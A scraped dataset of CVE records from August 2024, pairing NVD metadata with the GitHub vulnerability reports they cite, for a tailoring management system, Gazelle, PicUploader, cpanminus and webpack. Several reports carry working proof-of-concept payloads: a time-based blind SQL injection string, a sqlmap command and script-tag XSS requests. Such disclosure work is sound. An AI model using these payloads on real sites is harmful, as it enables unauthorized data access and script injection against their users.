text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.138:2223/staffcatedit.php?id=6 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4 Connection: close title=1231 ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'title' parameter ## Payload: ``` Parameter: title (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=1231' AND (SELECT 8494 FROM (SELECT(SLEEP(5)))ohzR) AND 'rSZL'='rSZL ``` <img width="367" alt="2" src="https://github.com/user-attachments/assets/1e75bf53-07df-4cc7-8195-d2b321fe9f08"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="360" alt="3" src="https://github.com/user-attachments/assets/45cdfe1d-83ca-4c5c-86aa-ccdd7d1f4085"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 staffcatedit.php SQL injection
https://api.github.com/repos/t4rrega/cve/issues/6/comments
1
2024-08-25T13:59:06Z
2024-08-28T12:19:53Z
https://github.com/t4rrega/cve/issues/6
2,485,276,575
6
6,217
CVE-2024-44793
2024-08-26T20:15:08.007
A cross-site scripting (XSS) vulnerability in the component /managers/multiple_freeleech.php of Gazelle commit 63b3370 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the torrents parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://gazelle.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/WhatCD/Gazelle" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WhatCD/Gazelle/issues/131" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gazelle_project:gazelle:*:*:*:*:*:*:*:*", "matchCriteriaId": "032237DC-F7F0-436E-8AE6-00709E76A3A4", "versionEndExcluding": "2016-11-08", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/WhatCD/Gazelle/issues/131
[ "Exploit", "Issue Tracking" ]
github.com
[ "WhatCD", "Gazelle" ]
Hello, I would like to report for a XSS vulnerability in gazelle commit 63b3370 In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php ```php ... <textarea name="torrents" style="width: 95%; height: 200px;"><?=$_POST['torrents']?></textarea><br /><br /> // Line 96 ... ``` Source from `$_POST['torrents']` without any filtering or checking which resulting in XSS. # Poc `POST /sections/tools/managers/multiple_freeleech.php` With the Data `torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>` # Manual verification ![3_0](https://github.com/user-attachments/assets/59520a97-f662-420e-af38-20bbcdec0e66) ![3](https://github.com/user-attachments/assets/6de53be7-88cb-43e6-9a69-a3dae1756a65) BTW,cms.gazelle.com in local(changes hosts)
xss_3
https://api.github.com/repos/WhatCD/Gazelle/issues/131/comments
3
2024-07-15T03:28:34Z
2025-01-05T15:31:54Z
https://github.com/WhatCD/Gazelle/issues/131
2,407,788,642
131
6,218
CVE-2024-44794
2024-08-26T20:15:08.073
A cross-site scripting (XSS) vulnerability in the component /master/auth/OnedriveRedirect.php of PicUploader commit fcf82ea allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error_description parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://picuploader.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/xiebruce/PicUploader" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xiebruce/PicUploader/issues/91" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xiebruce:picuploader:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6938C89-B864-4B8D-A87B-5EF1F9912A0F", "versionEndExcluding": "2024-02-13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xiebruce/PicUploader/issues/91
[ "Exploit", "Issue Tracking" ]
github.com
[ "xiebruce", "PicUploader" ]
Hello, I would like to report for a xss vulnerability in PicUploader commit fcf82ea # Analysis The path of the vulnerability: https://github.com/xiebruce/PicUploader/blob/master/auth/OnedriveRedirect.php ```php if(isset($_GET['code'])){ // Line 21 (Check) ... }else if(isset($_GET['error']) && isset($_GET['error_description'])){ // Line 38 (Check) echo $_GET['error_description']; // Line 39 (Sink) ``` Sink in Line 39(`echo $_GET['error_description'];`). There is no filtering, which resulting in XSS vulnerability # Poc `GET /auth/OnedriveRedirect.php?error=&error_description=%3Cscript%3Ealert(%27xss%27)%3C/script%3E` Here is the version without url encoding for ease of understanding: `GET /auth/OnedriveRedirect.php?error=&error_description=<script>alert('xss')</script>` # Manual verification ![3](https://github.com/user-attachments/assets/21e4afee-6eef-4258-96ef-b794a29504a7) ![4](https://github.com/user-attachments/assets/3b645b45-3759-4e8f-a8ba-e37ef948ff1a)
xss_2
https://api.github.com/repos/xiebruce/PicUploader/issues/91/comments
0
2024-07-17T08:03:24Z
2024-08-15T12:54:49Z
https://github.com/xiebruce/PicUploader/issues/91
2,412,943,655
91
6,219
CVE-2024-44795
2024-08-26T20:15:08.140
A cross-site scripting (XSS) vulnerability in the component /login/disabled.php of Gazelle commit 63b3370 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://gazelle.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/WhatCD/Gazelle" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WhatCD/Gazelle/issues/129" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gazelle_project:gazelle:*:*:*:*:*:*:*:*", "matchCriteriaId": "032237DC-F7F0-436E-8AE6-00709E76A3A4", "versionEndExcluding": "2016-11-08", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/WhatCD/Gazelle/issues/129
[ "Exploit", "Issue Tracking" ]
github.com
[ "WhatCD", "Gazelle" ]
Hello, I would like to report for a XSS vulnerability in gazelle commit 63b3370 In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php ```php ... <form action="" method="POST"> <input type="email" class="inputtext" placeholder="Email Address" name="email" required /> <input type="submit" value="Submit" /> <input type="hidden" name="username" value="<?=$_COOKIE['username']?>" /> // Line 25 </form><br /><br /> ... ``` Source from `$_COOKIE['username']` without any filtering or checking which resulting in XSS. # Poc `GET sections/login/disabled.php` With the Cookie `username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22` # Manual verification ![1_0](https://github.com/user-attachments/assets/df0116aa-d0cc-46fd-93e7-4005f07c4dc4) ![1](https://github.com/user-attachments/assets/00c0fde6-01c9-4dbf-81b2-3efea02d2c1f) BTW,cms.gazelle.com in local(changes hosts)
xss_1
https://api.github.com/repos/WhatCD/Gazelle/issues/129/comments
1
2024-07-15T03:28:30Z
2024-08-15T12:53:23Z
https://github.com/WhatCD/Gazelle/issues/129
2,407,788,581
129
6,220
CVE-2024-44796
2024-08-26T20:15:08.200
A cross-site scripting (XSS) vulnerability in the component /auth/AzureRedirect.php of PicUploader commit fcf82ea allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error_description parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://picuploader.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/xiebruce/PicUploader" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/xiebruce/PicUploader/issues/90" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xiebruce:picuploader:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6938C89-B864-4B8D-A87B-5EF1F9912A0F", "versionEndExcluding": "2024-02-13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xiebruce/PicUploader/issues/90
[ "Exploit" ]
github.com
[ "xiebruce", "PicUploader" ]
Hello, I would like to report for a xss vulnerability in PicUploader commit fcf82ea # Analysis The path of the vulnerability: https://github.com/xiebruce/PicUploader/blob/master/auth/AzureRedirect.php ```php if(isset($_GET['code'])){ // Line 21 (Check) ... }else if(isset($_GET['error']) && isset($_GET['error_description'])){ // Line 38 (Check) echo $_GET['error_description']; // Line 39 (Sink) ``` Sink in Line 39(`echo $_GET['error_description'];`). There is no filtering, which resulting in XSS vulnerability # Poc `GET /auth/AzureRedirect.php?error=&error_description=%3Cscript%3Ealert(%27xss%27)%3C/script%3E` Here is the version without url encoding for ease of understanding: `GET /auth/AzureRedirect.php?error=&error_description=<script>alert('xss')</script>` # Manual verification ![1](https://github.com/user-attachments/assets/93c8ab4e-6c49-4cc0-92be-a1ecd4263016) ![2](https://github.com/user-attachments/assets/c0e190b8-435b-4c5d-8b42-1087516b0c84)
xss_1
https://api.github.com/repos/xiebruce/PicUploader/issues/90/comments
0
2024-07-17T08:03:23Z
2024-08-15T12:54:36Z
https://github.com/xiebruce/PicUploader/issues/90
2,412,943,616
90
6,221
CVE-2024-44797
2024-08-26T20:15:08.257
A cross-site scripting (XSS) vulnerability in the component /managers/enable_requests.php of Gazelle commit 63b3370 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the view parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://gazelle.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/WhatCD/Gazelle" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/WhatCD/Gazelle/issues/130" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gazelle_project:gazelle:*:*:*:*:*:*:*:*", "matchCriteriaId": "032237DC-F7F0-436E-8AE6-00709E76A3A4", "versionEndExcluding": "2016-11-08", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/WhatCD/Gazelle/issues/130
[ "Exploit" ]
github.com
[ "WhatCD", "Gazelle" ]
Hello, I would like to report for a XSS vulnerability in gazelle commit 63b3370 In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/enable_requests.php ```php <input type="hidden" name="view" value="<?=$_GET['view']?>" /> // Line 159 <td><input type="text" name="username" value="<?=$_GET['username']?>" /></td> // Line 164 ... // There are still many unchecked outputs ``` Source from `$_GET['view']` without any filtering or checking which resulting in XSS. # Poc `GET sections/tools/managers/enable_requests.php?view=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22` # Manual verification ![2_0](https://github.com/user-attachments/assets/393d298c-dfa6-4cea-acd6-09029d647c41) ![2](https://github.com/user-attachments/assets/d0366d92-1ad3-4945-98a3-ce18632c868c) BTW,cms.gazelle.com in local(changes hosts)
xss_2
https://api.github.com/repos/WhatCD/Gazelle/issues/130/comments
1
2024-07-15T03:28:32Z
2024-08-15T12:53:39Z
https://github.com/WhatCD/Gazelle/issues/130
2,407,788,608
130
6,222
CVE-2024-45321
2024-08-27T04:15:09.010
The App::cpanminus package through 1.7047 for Perl downloads code via insecure HTTP, enabling code execution for network attackers.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/miyagawa/cpanminus/issues/611" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/miyagawa/cpanminus/pull/674" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.metacpan.org/2024/08/26/cpanminus-downloads-code-using-insecure-http.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:app\\:\\:cpanminus_project:app\\:\\:cpanminus:*:*:*:*:*:perl:*:*", "matchCriteriaId": "E7633BA7-2A2E-45A8-9A0F-69E1E35D0D2A", "versionEndExcluding": null, "versionEndIncluding": "1.7047", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "494" ]
494
https://github.com/miyagawa/cpanminus/issues/611
[ "Issue Tracking" ]
github.com
[ "miyagawa", "cpanminus" ]
Hi! I'm starting to work across the community to try and help "[Securing Perl](https://docs.google.com/document/d/1DRkiCJhJu4RDI0u_JppBpFa0djouskxEyNHax912U_w/edit#)" by encouraging the checking of module signatures, moving mirrors to HTTPS, nudging defaults toward connecting to HTTPS mirrors when possible, and checking server SSL certificates. Specific to cpanm, I'm wondering if it makes sense to: - Update all HTTP::Tiny->new to include verify_SSL=>1, since HTTP::Tiny [doesn't verify SSL certificates by default](https://metacpan.org/pod/HTTP::Tiny#SSL-SUPPORT) when using https (see [discussion](https://github.com/chansen/p5-http-tiny/issues/134)) - Use https:// URLs when at all possible to pull metadata and packages. Over half of the CPAN mirrors already support mirroring over TLS! - verify SIGNATURES and CHECKSUMs by default Is there interest in updating cpanm in this way or thoughts on the approach here?
Securing Perl: cpanm HTTPS + verify_SSL + verify signatures?
https://api.github.com/repos/miyagawa/cpanminus/issues/611/comments
18
2020-06-24T07:03:53Z
2024-09-09T10:10:48Z
https://github.com/miyagawa/cpanminus/issues/611
644,372,617
611
6,223
CVE-2024-43788
2024-08-27T17:15:07.967
Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 4.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Mitigation", "Technical Description", "Third Party Advisory" ], "url": "https://scnps.co/papers/sp23_domclob.pdf" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "10BD162E-912D-4458-A67B-F7BC3602FDC5", "versionEndExcluding": "5.94.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270
null
github.com
[ "webpack", "webpack" ]
I see CVE-2024-43788 was [patched](https://github.com/webpack/webpack/pull/18700) in Webpack 5, and the CVE shows that Webpack 4 and below are affected, but are Webpack 4 and below actually affected? I don't see any code in Webpack 4 that looks like the patch that was applied to Webpack 5.
Does CVE-2024-43788 actually affect Webpack 4?
https://api.github.com/repos/webpack/webpack/issues/18718/comments
7
2024-08-28T17:19:38Z
2024-09-17T14:17:02Z
https://github.com/webpack/webpack/issues/18718
2,492,626,936
18,718
6,224
CVE-2024-8218
2024-08-27T21:15:08.350
A vulnerability was found in code-projects Online Quiz Site 1.0 and classified as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument loginid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/t4rrega/cve/issues/7" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275927" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.275927" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.398204" } ]
